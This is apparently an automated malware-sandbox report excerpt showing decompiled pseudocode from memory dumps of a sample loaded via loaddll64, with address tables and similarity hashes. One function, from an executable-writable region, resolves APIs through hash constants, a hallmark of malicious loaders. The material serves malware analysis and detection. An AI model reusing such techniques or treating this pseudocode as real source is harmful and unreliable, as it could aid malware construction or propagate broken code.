				asm("movaps [ebp-0x1], xmm0");
				 *((char*)(_t282 - 0x61)) = 0;
				asm("movsd [ebp+0xf], xmm1");
				_t140 = E00007FFC7FFC130F1E14( *_t278,  *(_t282 - 0x49) >> 0x20, _t282 - 1, _t280, _t282 - 0x61);
				if (_t140 == 0) goto 0x130f26f2;
				r13d = _t140;
				E00007FFC7FFC130F5278( *_t278, r12d & 0x0000003f, _t185, _t140,  *((intOrPtr*)(0x13124970 + ( *__rdx >> 6) * 8)),  *(_t282 - 0x49) >> 0x20, _t280);
				goto 0x130f280e;
				 *((char*)( *((intOrPtr*)(0x13124970 + ( *_t278 >> 6) * 8)) + ( *_t278 << 6) + 0x39)) =  *((intOrPtr*)(_t282 - 0x61));
				_t272 =  *_t278;
				_t273 = _t272 << 6;
				_t251 =  *((intOrPtr*)(0x13124970 + (_t272 >> 6) * 8));
				 *(_t251 + _t273 + 0x3d) =  *(_t251 + _t273 + 0x3d) & 0x000000fe;
				 *(_t251 + _t273 + 0x3d) =  *(_t251 + _t273 + 0x3d) | r12d >> 0x00000010 & 0x00000001;
				if ((_t161 & 0x00000048) != 0) goto 0x130f2759;
				if ((r12b & 0x00000008) == 0) goto 0x130f2759;
				_t252 =  *_t278;
				_t221 =  *((intOrPtr*)(0x13124970 + (_t252 >> 6) * 8));
				 *(_t221 + (_t252 << 6) + 0x38) =  *(_t221 + (_t252 << 6) + 0x38) | 0x00000020;
				if ((r14d & 0xc0000000) != 0xc0000000) goto 0x130f280c;
				if ((r12b & 0x00000001) == 0) goto 0x130f280c;
				CloseHandle(_t281);
				 *(_t285 + 0x30) =  *(_t285 + 0x30) & 0x00000000;
				asm("inc ecx");
				r8d =  *(_t282 - 0x11);
				 *(_t285 + 0x28) = 0xc0000000;
				 *((intOrPtr*)(_t285 + 0x20)) =  *((intOrPtr*)(_t282 - 0x51));
				 *(_t282 - 0x55) = r14d;
				CreateFileW(??, ??, ??, ??, ??, ??, ??);
				if (_t221 != 0xffffffff) goto 0x130f27f2;
				E00007FFC7FFC130EE630(GetLastError(), _t221,  *(_t282 - 0x49) >> 0x20);
				 *( *((intOrPtr*)(0x13124970 + ( *_t278 >> 6) * 8)) + ( *_t278 << 6) + 0x38) =  *( *((intOrPtr*)(0x13124970 + ( *_t278 >> 6) * 8)) + ( *_t278 << 6) + 0x38) & 0x000000fe;
				E00007FFC7FFC130F3DB0(_t161,  *_t278, _t185, _t231, _t278, _t280);
				goto 0x130f24bb;
				 *((long long*)( *((intOrPtr*)(0x13124970 + ( *_t278 >> 6) * 8)) + ( *_t278 << 6) + 0x28)) = _t221;
				return 0;
			}

































                                0x7ffc130f243c
                                0x7ffc130f243c
                                0x7ffc130f243c
                                0x7ffc130f243f
                                0x7ffc130f2443
                                0x7ffc130f2447
                                0x7ffc130f2454
                                0x7ffc130f2458
                                0x7ffc130f245f
                                0x7ffc130f2465
                                0x7ffc130f2469
                                0x7ffc130f246c
                                0x7ffc130f2470
                                0x7ffc130f247a
                                0x7ffc130f247f
                                0x7ffc130f2482
                                0x7ffc130f2485
                                0x7ffc130f248a
                                0x7ffc130f2493
                                0x7ffc130f2497
                                0x7ffc130f249b
                                0x7ffc130f24a0
                                0x7ffc130f24a5
                                0x7ffc130f24ae
                                0x7ffc130f24b0
                                0x7ffc130f24b5
                                0x7ffc130f24b8
                                0x7ffc130f24bb
                                0x7ffc130f24c2
                                0x7ffc130f24c7
                                0x7ffc130f24cc
                                0x7ffc130f24d1
                                0x7ffc130f24d3
                                0x7ffc130f24d8
                                0x7ffc130f24db
                                0x7ffc130f24de
                                0x7ffc130f24e3
                                0x7ffc130f24e9
                                0x7ffc130f24eb
                                0x7ffc130f24ff
                                0x7ffc130f2502
                                0x7ffc130f2507
                                0x7ffc130f2514
                                0x7ffc130f251a
                                0x7ffc130f2520
                                0x7ffc130f2524
                                0x7ffc130f252f
                                0x7ffc130f2536
                                0x7ffc130f2539
                                0x7ffc130f253d
                                0x7ffc130f2543
                                0x7ffc130f254c
                                0x7ffc130f2557
                                0x7ffc130f2564
                                0x7ffc130f256a
                                0x7ffc130f256c
                                0x7ffc130f2579
                                0x7ffc130f257e
                                0x7ffc130f2582
                                0x7ffc130f2589
                                0x7ffc130f258d
                                0x7ffc130f2599
                                0x7ffc130f259f
                                0x7ffc130f25aa
                                0x7ffc130f25ac
                                0x7ffc130f25c4
                                0x7ffc130f25c8
                                0x7ffc130f25d5
                                0x7ffc130f25da
                                0x7ffc130f25ea
                                0x7ffc130f25ec
                                0x7ffc130f25f6
                                0x7ffc130f2617
                                0x7ffc130f261f
                                0x7ffc130f2627
                                0x7ffc130f262d
                                0x7ffc130f2632
                                0x7ffc130f2638
                                0x7ffc130f2643
                                0x7ffc130f2648
                                0x7ffc130f264d
                                0x7ffc130f264f
                                0x7ffc130f2657
                                0x7ffc130f2669
                                0x7ffc130f2677
                                0x7ffc130f267e
                                0x7ffc130f2697
                                0x7ffc130f26a0
                                0x7ffc130f26a4
                                0x7ffc130f26a9
                                0x7ffc130f26ae
                                0x7ffc130f26b4
                                0x7ffc130f26be
                                0x7ffc130f26c7
                                0x7ffc130f26ca
                                0x7ffc130f26ce
                                0x7ffc130f26d2
                                0x7ffc130f26d7
                                0x7ffc130f26de
                                0x7ffc130f26e0
                                0x7ffc130f26e5
                                0x7ffc130f26ed
                                0x7ffc130f270a
                                0x7ffc130f270e
                                0x7ffc130f271b
                                0x7ffc130f271f
                                0x7ffc130f272b
                                0x7ffc130f2730
                                0x7ffc130f2737
                                0x7ffc130f273d
                                0x7ffc130f273f
                                0x7ffc130f2750
                                0x7ffc130f2754
                                0x7ffc130f2765
                                0x7ffc130f276f
                                0x7ffc130f2778
                                0x7ffc130f2786
                                0x7ffc130f278c
                                0x7ffc130f2791
                                0x7ffc130f2795
                                0x7ffc130f279c
                                0x7ffc130f27a4
                                0x7ffc130f27b0
                                0x7ffc130f27bd
                                0x7ffc130f27c7
                                0x7ffc130f27e1
                                0x7ffc130f27e8
                                0x7ffc130f27ed
                                0x7ffc130f2807
                                0x7ffc130f282a

                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type_get_daylight
                                • String ID:
                                • API String ID: 1330151763-0
                                • Opcode ID: 544f02e6fad5c1fd8408f698f3878f30c1ec09c20e745f70c9dbf413a5d11e2f
                                • Instruction ID: 25588ca94b627607ef5f1f763dcafdefba288fa573b939a7fcf0709a7b59f7d7
                                • Opcode Fuzzy Hash: 544f02e6fad5c1fd8408f698f3878f30c1ec09c20e745f70c9dbf413a5d11e2f
                                • Instruction Fuzzy Hash: 31C1CD36B28E598AEB54CF64D9513AC37A5FB48BA8F014235CA2E677D5CF38E425C310
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130F5864 Relevance: 10.8, APIs: 7, Instructions: 294COMMON
                                Download Yara Rule
                                C-Code - Quality: 86%
                                			E00007FFC7FFC130F5864(void* __ebx, signed int __ecx, void* __edx, void* __ebp, signed int* __rax, long long __rbx, long long __rdx, long long __r8) {
				void* _t118;
				unsigned int _t135;
				void* _t139;
				void* _t142;
				char _t154;
				char _t155;
				char _t156;
				void* _t181;
				long long _t186;
				long long _t220;
				intOrPtr _t221;
				signed short* _t235;
				signed int* _t238;
				char* _t241;
				signed short* _t250;
				signed long long _t255;
				signed long long _t256;
				signed long long _t261;
				DWORD* _t263;
				signed short* _t264;
				void* _t270;
				void* _t272;
				signed long long _t274;
				void* _t276;
				void* _t277;
				long long _t279;
				signed short* _t281;
				signed short* _t288;
				long _t292;
				void* _t294;
				void* _t297;
				void* _t299;
				char* _t301;
				char* _t302;
				char* _t303;

				_t279 = __r8;
				 *((long long*)(_t276 + 0x18)) = __rbx;
				 *((long long*)(_t276 + 0x10)) = __rdx;
				_t277 = _t276 - 0x60;
				r12d = r8d;
				if (r13d != 0xfffffffe) goto 0x130f58a5;
				E00007FFC7FFC130EE680(__rax);
				 *__rax = 0;
				E00007FFC7FFC130EE6A0(__rax);
				 *__rax = 9;
				goto 0x130f5cae;
				if (__ecx < 0) goto 0x130f5c97;
				_t181 = r13d -  *0x13124d70; // 0x40
				if (_t181 >= 0) goto 0x130f5c97;
				_t3 = _t270 + 1; // 0x1
				r8d = _t3;
				 *((long long*)(_t277 + 0x48)) = __r8;
				_t274 = __ecx << 6;
				_t255 = __ecx >> 6;
				 *(_t277 + 0x40) = _t255;
				_t220 =  *((intOrPtr*)(0x13124970 + _t255 * 8));
				if (( *(_t220 + _t274 + 0x38) & r8b) == 0) goto 0x130f5c97;
				if (r12d - 0x7fffffff <= 0) goto 0x130f5911;
				E00007FFC7FFC130EE680(_t220);
				 *_t220 = 0;
				E00007FFC7FFC130EE6A0(_t220);
				 *_t220 = 0x16;
				goto 0x130f5ca9;
				if (r12d == 0) goto 0x130f5c93;
				if (( *(_t220 + _t274 + 0x38) & 0x00000002) != 0) goto 0x130f5c93;
				_t186 = __rdx;
				if (_t186 == 0) goto 0x130f58fa;
				r10d =  *((char*)(_t220 + _t274 + 0x39));
				 *((long long*)(_t277 + 0x38)) =  *((intOrPtr*)(_t220 + _t274 + 0x28));
				 *((intOrPtr*)(_t277 + 0xa0)) = r10b;
				if (_t186 == 0) goto 0x130f596c;
				if (_t186 != 0) goto 0x130f5961;
				if ((r8b &  !r12d) == 0) goto 0x130f5976;
				r14d = r12d;
				goto 0x130f5a0c;
				if ((r8b &  !r12d) != 0) goto 0x130f5992;
				E00007FFC7FFC130EE680(_t220);
				 *_t220 = 0;
				_t118 = E00007FFC7FFC130EE6A0(_t220);
				 *_t220 = 0x16;
				E00007FFC7FFC130EE580(_t118);
				goto 0x130f5b18;
				r14d = r12d;
				r14d = r14d >> 1;
				r14d =  <  ? 4 : r14d;
				E00007FFC7FFC130EE154(_t220,  *((intOrPtr*)(_t220 + _t274 + 0x28)));
				_t241 = _t220;
				E00007FFC7FFC130EE114(_t220,  *((intOrPtr*)(_t220 + _t274 + 0x28)));
				E00007FFC7FFC130EE114(_t220,  *((intOrPtr*)(_t220 + _t274 + 0x28)));
				_t301 = _t241;
				if (_t241 != 0) goto 0x130f59db;
				E00007FFC7FFC130EE6A0(_t220);
				 *_t220 = 0xc;
				E00007FFC7FFC130EE680(_t220);
				 *_t220 = 8;
				goto 0x130f5b18;
				_t26 = _t255 + 1; // 0x1
				r8d = _t26;
				E00007FFC7FFC130F5D68(_t220,  *((intOrPtr*)(_t220 + _t274 + 0x28)), _t255);
				_t256 =  *(_t277 + 0x40);
				r10b =  *((intOrPtr*)(_t277 + 0xa0));
				r8d = 1;
				 *((long long*)( *((intOrPtr*)(0x13124970 + _t256 * 8)) + _t274 + 0x30)) = _t220;
				_t221 =  *((intOrPtr*)(0x13124970 + _t256 * 8));
				 *((long long*)(_t277 + 0x50)) = _t301;
				r9d = 0xa;
				if (( *(_t221 + _t274 + 0x38) & 0x00000048) == 0) goto 0x130f5aa1;
				_t154 =  *((intOrPtr*)(_t221 + _t274 + 0x3a));
				if (_t154 == r9b) goto 0x130f5aa1;
				if (r14d == 0) goto 0x130f5aa1;
				 *_t301 = _t154;
				r14d = r14d - 1;
				_t302 = _t301 + _t279;
				 *((intOrPtr*)( *((intOrPtr*)(0x13124970 + _t256 * 8)) + _t274 + 0x3a)) = r9b;
				if (r10b == 0) goto 0x130f5aa1;
				_t155 =  *((intOrPtr*)( *((intOrPtr*)(0x13124970 + _t256 * 8)) + _t274 + 0x3b));
				if (_t155 == r9b) goto 0x130f5aa1;
				if (r14d == 0) goto 0x130f5aa1;
				 *_t302 = _t155;
				_t303 = _t302 + _t279;
				r14d = r14d - 1;
				 *((intOrPtr*)( *((intOrPtr*)(0x13124970 + _t256 * 8)) + _t274 + 0x3b)) = r9b;
				if (r10b != r8b) goto 0x130f5aa1;
				_t156 =  *((intOrPtr*)( *((intOrPtr*)(0x13124970 + _t256 * 8)) + _t274 + 0x3c));
				if (_t156 == r9b) goto 0x130f5aa1;
				if (r14d == 0) goto 0x130f5aa1;
				 *_t303 = _t156;
				r14d = r14d - 1;
				 *((intOrPtr*)( *((intOrPtr*)(0x13124970 + _t256 * 8)) + _t274 + 0x3c)) = r9b;
				if (E00007FFC7FFC130F3EE4(r13d, 0,  *((intOrPtr*)(0x13124970 + _t256 * 8))) == 0) goto 0x130f5b36;
				_t228 =  *((intOrPtr*)(0x13124970 +  *(_t277 + 0x40) * 8));
				if (( *( *((intOrPtr*)(0x13124970 +  *(_t277 + 0x40) * 8)) + _t274 + 0x38) & 0x00000080) == 0) goto 0x130f5b36;
				if (GetConsoleMode(_t299) == 0) goto 0x130f5b36;
				if ( *((char*)(_t277 + 0xa0)) != 2) goto 0x130f5b3b;
				r14d = r14d >> 1;
				r8d = r14d;
				 *(_t277 + 0x20) = _t270;
				if (ReadConsoleW(_t297, _t294, _t292, _t263, _t270) != 0) goto 0x130f5b2a;
				E00007FFC7FFC130EE630(GetLastError(),  *((intOrPtr*)(0x13124970 +  *(_t277 + 0x40) * 8)), _t241);
				E00007FFC7FFC130EE114( *((intOrPtr*)(0x13124970 +  *(_t277 + 0x40) * 8)), _t241);
				goto 0x130f5cb1;
				goto 0x130f5b76;
				 *((intOrPtr*)(_t277 + 0x48)) = sil;
				r8d = r14d;
				 *(_t277 + 0x20) = _t270;
				if (ReadFile(_t272, ??, ??, ??) == 0) goto 0x130f5c5d;
				if ( *((intOrPtr*)(_t277 + 0xb8)) - r12d > 0) goto 0x130f5c5d;
				if (( *( *((intOrPtr*)(0x13124970 +  *(_t277 + 0x40) * 8)) + _t274 + 0x38) & 0x00000080) == 0) goto 0x130f5b1b;
				if ( *((char*)(_t277 + 0xa0)) == 2) goto 0x130f5bbf;
				_t261 = _t303 + _t279;
				 *(_t277 + 0x20) = _t292 >> 1;
				_t135 = E00007FFC7FFC130F5564(__ebx, r13d, _t263 + _t228 * 2 +  *((intOrPtr*)(_t277 + 0xb8)), _t261, _t263 + _t228 * 2 +  *((intOrPtr*)(_t277 + 0xb8)),  *((intOrPtr*)(_t277 + 0xa8)));
				goto 0x130f5b1b;
				if (_t135 == 0) goto 0x130f5c45;
				_t281 =  *((intOrPtr*)(_t277 + 0x50));
				_t250 = _t281;
				_t264 = _t281;
				_t288 =  &(_t281[_t135 >> 1]);
				if (_t281 - _t288 >= 0) goto 0x130f5c38;
				_t235 =  &(_t281[1]);
				r9d =  *_t250 & 0x0000ffff;
				if (r9w == 0x1a) goto 0x130f5c2f;
				if (r9w != 0xd) goto 0x130f5c18;
				if (_t235 - _t288 >= 0) goto 0x130f5c18;
				if ( *_t235 != 0xa) goto 0x130f5c18;
				 *_t264 = 0xa;
				goto 0x130f5c28;
				_t264[1] = r9w;
				if ( &(_t250[3]) - _t288 < 0) goto 0x130f5beb;
				goto 0x130f5c38;
				_t238 =  *((intOrPtr*)(0x13124970 + _t261 * 8));
				 *(_t238 + _t274 + 0x38) =  *(_t238 + _t274 + 0x38) | 0x00000002;
				goto 0x130f5b1b;
				E00007FFC7FFC130F5334(r13d, _t135 + _t135,  *((intOrPtr*)(_t277 + 0x50)), _t135 + _t135 >> 1);
				goto 0x130f5bb8;
				if (GetLastError() != 5) goto 0x130f5c83;
				E00007FFC7FFC130EE6A0(_t238);
				 *_t238 = 9;
				_t139 = E00007FFC7FFC130EE680(_t238);
				 *_t238 = 5;
				goto 0x130f5b18;
				if (_t139 != 0x6d) goto 0x130f5b11;
				goto 0x130f5b1b;
				goto 0x130f5cb1;
				E00007FFC7FFC130EE680(_t238);
				 *_t238 = 0xa;
				_t142 = E00007FFC7FFC130EE6A0(_t238);
				 *_t238 = 9;
				return E00007FFC7FFC130EE580(_t142) | 0xffffffff;
			}






































                                0x7ffc130f5864
                                0x7ffc130f5864
                                0x7ffc130f5869
                                0x7ffc130f5879
                                0x7ffc130f5883
                                0x7ffc130f588a
                                0x7ffc130f588c
                                0x7ffc130f5893
                                0x7ffc130f5895
                                0x7ffc130f589a
                                0x7ffc130f58a0
                                0x7ffc130f58a9
                                0x7ffc130f58af
                                0x7ffc130f58b6
                                0x7ffc130f58bf
                                0x7ffc130f58bf
                                0x7ffc130f58c6
                                0x7ffc130f58ce
                                0x7ffc130f58d2
                                0x7ffc130f58dd
                                0x7ffc130f58e2
                                0x7ffc130f58eb
                                0x7ffc130f58f8
                                0x7ffc130f58fa
                                0x7ffc130f58ff
                                0x7ffc130f5901
                                0x7ffc130f5906
                                0x7ffc130f590c
                                0x7ffc130f5914
                                0x7ffc130f591f
                                0x7ffc130f5925
                                0x7ffc130f5928
                                0x7ffc130f5932
                                0x7ffc130f593d
                                0x7ffc130f5945
                                0x7ffc130f5950
                                0x7ffc130f5955
                                0x7ffc130f595f
                                0x7ffc130f5961
                                0x7ffc130f5967
                                0x7ffc130f5974
                                0x7ffc130f5976
                                0x7ffc130f597b
                                0x7ffc130f597d
                                0x7ffc130f5982
                                0x7ffc130f5988
                                0x7ffc130f598d
                                0x7ffc130f5992
                                0x7ffc130f5995
                                0x7ffc130f599b
                                0x7ffc130f59a2
                                0x7ffc130f59a9
                                0x7ffc130f59ac
                                0x7ffc130f59b3
                                0x7ffc130f59b8
                                0x7ffc130f59be
                                0x7ffc130f59c0
                                0x7ffc130f59c5
                                0x7ffc130f59cb
                                0x7ffc130f59d0
                                0x7ffc130f59d6
                                0x7ffc130f59e0
                                0x7ffc130f59e0
                                0x7ffc130f59e4
                                0x7ffc130f59e9
                                0x7ffc130f59f5
                                0x7ffc130f59fd
                                0x7ffc130f5a07
                                0x7ffc130f5a0c
                                0x7ffc130f5a12
                                0x7ffc130f5a17
                                0x7ffc130f5a22
                                0x7ffc130f5a24
                                0x7ffc130f5a2b
                                0x7ffc130f5a30
                                0x7ffc130f5a32
                                0x7ffc130f5a35
                                0x7ffc130f5a3c
                                0x7ffc130f5a42
                                0x7ffc130f5a4a
                                0x7ffc130f5a50
                                0x7ffc130f5a57
                                0x7ffc130f5a5c
                                0x7ffc130f5a5e
                                0x7ffc130f5a69
                                0x7ffc130f5a6c
                                0x7ffc130f5a6f
                                0x7ffc130f5a77
                                0x7ffc130f5a7d
                                0x7ffc130f5a84
                                0x7ffc130f5a89
                                0x7ffc130f5a8b
                                0x7ffc130f5a99
                                0x7ffc130f5a9c
                                0x7ffc130f5aab
                                0x7ffc130f5abd
                                0x7ffc130f5ac6
                                0x7ffc130f5ada
                                0x7ffc130f5ae4
                                0x7ffc130f5af3
                                0x7ffc130f5af9
                                0x7ffc130f5afc
                                0x7ffc130f5b09
                                0x7ffc130f5b13
                                0x7ffc130f5b1e
                                0x7ffc130f5b25
                                0x7ffc130f5b34
                                0x7ffc130f5b36
                                0x7ffc130f5b48
                                0x7ffc130f5b4b
                                0x7ffc130f5b5b
                                0x7ffc130f5b69
                                0x7ffc130f5b8b
                                0x7ffc130f5b95
                                0x7ffc130f5ba5
                                0x7ffc130f5bae
                                0x7ffc130f5bb3
                                0x7ffc130f5bba
                                0x7ffc130f5bc6
                                0x7ffc130f5bc8
                                0x7ffc130f5bd0
                                0x7ffc130f5bd6
                                0x7ffc130f5bd9
                                0x7ffc130f5be0
                                0x7ffc130f5be2
                                0x7ffc130f5beb
                                0x7ffc130f5bf4
                                0x7ffc130f5bfb
                                0x7ffc130f5c00
                                0x7ffc130f5c05
                                0x7ffc130f5c0b
                                0x7ffc130f5c16
                                0x7ffc130f5c18
                                0x7ffc130f5c2b
                                0x7ffc130f5c2d
                                0x7ffc130f5c2f
                                0x7ffc130f5c33
                                0x7ffc130f5c40
                                0x7ffc130f5c53
                                0x7ffc130f5c58
                                0x7ffc130f5c66
                                0x7ffc130f5c68
                                0x7ffc130f5c6d
                                0x7ffc130f5c73
                                0x7ffc130f5c78
                                0x7ffc130f5c7e
                                0x7ffc130f5c86
                                0x7ffc130f5c8e
                                0x7ffc130f5c95
                                0x7ffc130f5c97
                                0x7ffc130f5c9c
                                0x7ffc130f5c9e
                                0x7ffc130f5ca3
                                0x7ffc130f5cc8

                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID: _invalid_parameter_noinfo
                                • String ID:
                                • API String ID: 3215553584-0
                                • Opcode ID: 9572a25240cbba2ebec1dfc6c115ffcd4b7ea8cb82a20bbf97e2d75b67ba7c1d
                                • Instruction ID: d87aa89be38254d429dec8f1926e9f76cc9980d3ac39fc49bde44a9cb0598bb5
                                • Opcode Fuzzy Hash: 9572a25240cbba2ebec1dfc6c115ffcd4b7ea8cb82a20bbf97e2d75b67ba7c1d
                                • Instruction Fuzzy Hash: 23C1F422A1CEAEC7EA648F10994027D6BD9BB80BE8F550174DA4E233D5CF3DD865C360
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00000201640C1BFC Relevance: 10.7, APIs: 5, Strings: 2, Instructions: 216memoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 17%
                                			E00000201201640C1BFC(long long* __rax, long long __rbx, intOrPtr* __rcx, long long __rdx, intOrPtr _a8, long long _a16, long long _a24, long long _a40, long long _a48) {
				long long _v72;
				char _v80;
				char _v88;
				long long _v96;
				char _v104;
				signed int _v112;
				long long _v120;
				long long _v128;
				intOrPtr _v136;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				signed int _t65;
				intOrPtr _t93;
				intOrPtr _t94;
				long long* _t148;
				long long* _t152;
				long long* _t155;
				long long* _t157;
				intOrPtr* _t188;
				intOrPtr _t189;
				long long _t192;
				long long* _t193;
				void* _t203;
				intOrPtr _t213;
				long long _t214;

				_t157 = __rbx;
				_t148 = __rax;
				_a24 = __rbx;
				_a16 = __rdx;
				_t214 =  *0x640cd458;
				_t192 =  *((intOrPtr*)(__rcx));
				r13d = r8d;
				_t193 = __rcx;
				_v72 = _t214;
				_v96 = _t192;
				if ( *((intOrPtr*)(__rcx + 0x70)) -  *((intOrPtr*)(__rcx + 0x50)) < 0) goto 0x640c1c4a;
				E00000201201640C47B8(0, __rax, __rbx, __rcx, __rdx);
				E00000201201640C908C(0x4a75e5e7, __rax,  *((intOrPtr*)(_t214 + 0x10)));
				if (_t148 == _t157) goto 0x640c1c63;
				_t9 = _t192 + 0x18; // 0x18
				 *_t148();
				_t65 =  *(_t193 + 0x50) & 0x000000ff;
				if (( *(_t193 + 0x70) & 0x000000ff) - _t65 >= 0) goto 0x640c1cdd;
				_t188 =  *((intOrPtr*)( *((intOrPtr*)(_t193 + 0x48)) + _t9 * 8));
				_t93 =  *_t188;
				if (_t93 == 0) goto 0x640c1c94;
				if (_t93 == 0x2f) goto 0x640c1c90;
				_t94 =  *((intOrPtr*)(_t188 + 1));
				if (_t94 != 0) goto 0x640c1c82;
				if (_t94 != 0) goto 0x640c1c97;
				_t152 = _t157;
				if (_t152 == _t157) goto 0x640c1caf;
				if ( *((char*)(_t152 - 1)) != 0x3a) goto 0x640c1caf;
				if ( *((char*)(_t152 + 1)) != 0x2f) goto 0x640c1caf;
				E00000201201640C240C(0, _t157, _t9 + _t188, _t192, _t193);
				if (_t152 == _t157) goto 0x640c1cdd;
				bpl = _t65 - 0x4a75e5e7 + 2 == 8;
				_a8 = 0;
				goto 0x640c1ceb;
				E00000201201640C908C(0x8d72aad2, _t152,  *((intOrPtr*)(_t214 + 0x10)));
				if (_t152 == _t157) goto 0x640c1d09;
				 *_t152();
				if (_t152 == _t157) goto 0x640c1ed1;
				_t23 =  &_v104; // 0x2
				r9d = 0;
				r8d = r13d;
				_v112 = _t23;
				_t25 =  &_v88; // 0x12
				_t189 = _a16;
				_v120 = _t25;
				_t27 =  &_v80; // 0x1a
				_t155 = _t27;
				_v128 = _t155;
				_v136 = 0;
				if (E00000201201640C5168(_t157, _t193, _t189, _t203) != 0) goto 0x640c1ec1;
				_t213 =  *0x640cd458;
				E00000201201640C908C(0x4a75e5e7, _t155,  *((intOrPtr*)(_t213 + 0x10)));
				if (_t155 == _t157) goto 0x640c1d77;
				 *_t155();
				if ( *((intOrPtr*)(_t193 + 0x18)) == _t157) goto 0x640c1d8c;
				E00000201201640C240C(0, _t157,  *((intOrPtr*)(_t193 + 0x18)), _t192, _t193);
				goto 0x640c1d94;
				E00000201201640C908C(0x8d72aad2, _t155,  *((intOrPtr*)(_t213 + 0x10)));
				if (_t155 == _t157) goto 0x640c1dad;
				 *_t155();
				if (_a8 == _t157) goto 0x640c1ea1;
				E00000201201640C908C(0xfb849f8f, _t155,  *((intOrPtr*)(_t214 + 0x18)));
				if (_t155 == _t157) goto 0x640c1dd5;
				r14d =  *_t155();
				goto 0x640c1dd8;
				r14d = 0;
				E00000201201640C908C(0xfb849f8f, _t155,  *((intOrPtr*)(_v72 + 0x18)));
				if (_t155 == _t157) goto 0x640c1df7;
				r13d =  *_t155();
				goto 0x640c1dfa;
				r13d = 0;
				_t40 = _t214 + 2; // 0x2
				E00000201201640C240C(_t213 + _t40, _t157, _t152, _t192, _a8);
				if (_t155 == _t157) goto 0x640c1e93;
				_t41 = _t213 + 1; // 0x1
				r8d = _t41;
				 *((char*)(_t189 + _t155)) = 0x2f;
				0x640c47b0();
				_v112 = 0 | _a8 != 0x00000000 | 0x00000002;
				_v120 = _a48;
				_v128 = _a40;
				_v136 = _v104;
				if (E00000201201640C6518(_a40, _v96, _t155, _t192, _a8, _t155, _v80, _v88) != 0x10d2) goto 0x640c1e85;
				asm("sbb eax, eax");
				HeapFree(??, ??, ??);
				HeapFree(??, ??, ??);
				HeapFree(??, ??, ??);
				HeapFree(??, ??, ??);
				HeapFree(??, ??, ??);
				goto 0x640c1ed6;
				return 8;
			}





























                                0x201640c1bfc
                                0x201640c1bfc
                                0x201640c1bfc
                                0x201640c1c01
                                0x201640c1c15
                                0x201640c1c1f
                                0x201640c1c28
                                0x201640c1c2e
                                0x201640c1c31
                                0x201640c1c36
                                0x201640c1c41
                                0x201640c1c45
                                0x201640c1c53
                                0x201640c1c5b
                                0x201640c1c5d
                                0x201640c1c61
                                0x201640c1c67
                                0x201640c1c6d
                                0x201640c1c75
                                0x201640c1c7c
                                0x201640c1c80
                                0x201640c1c85
                                0x201640c1c8a
                                0x201640c1c8e
                                0x201640c1c92
                                0x201640c1c94
                                0x201640c1c9a
                                0x201640c1ca0
                                0x201640c1ca6
                                0x201640c1cb6
                                0x201640c1cc1
                                0x201640c1cc8
                                0x201640c1ccc
                                0x201640c1cdb
                                0x201640c1cf4
                                0x201640c1cfc
                                0x201640c1d07
                                0x201640c1d0c
                                0x201640c1d12
                                0x201640c1d17
                                0x201640c1d1a
                                0x201640c1d1d
                                0x201640c1d22
                                0x201640c1d27
                                0x201640c1d2a
                                0x201640c1d2f
                                0x201640c1d2f
                                0x201640c1d37
                                0x201640c1d3c
                                0x201640c1d49
                                0x201640c1d4f
                                0x201640c1d67
                                0x201640c1d6f
                                0x201640c1d75
                                0x201640c1d7e
                                0x201640c1d82
                                0x201640c1d8a
                                0x201640c1d9d
                                0x201640c1da5
                                0x201640c1dab
                                0x201640c1db0
                                0x201640c1dc1
                                0x201640c1dc9
                                0x201640c1dd0
                                0x201640c1dd3
                                0x201640c1dd5
                                0x201640c1de3
                                0x201640c1deb
                                0x201640c1df2
                                0x201640c1df5
                                0x201640c1df7
                                0x201640c1dfa
                                0x201640c1e02
                                0x201640c1e0d
                                0x201640c1e16
                                0x201640c1e16
                                0x201640c1e1f
                                0x201640c1e26
                                0x201640c1e52
                                0x201640c1e5e
                                0x201640c1e67
                                0x201640c1e6c
                                0x201640c1e7c
                                0x201640c1e81
                                0x201640c1e8d
                                0x201640c1e9b
                                0x201640c1eab
                                0x201640c1ebb
                                0x201640c1ec9
                                0x201640c1ecf
                                0x201640c1eef

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.631292957.00000201640C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000201640C0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_201640c0000_loaddll64.jbxd
                                Similarity
                                • API ID: FreeHeap$ErrorLast
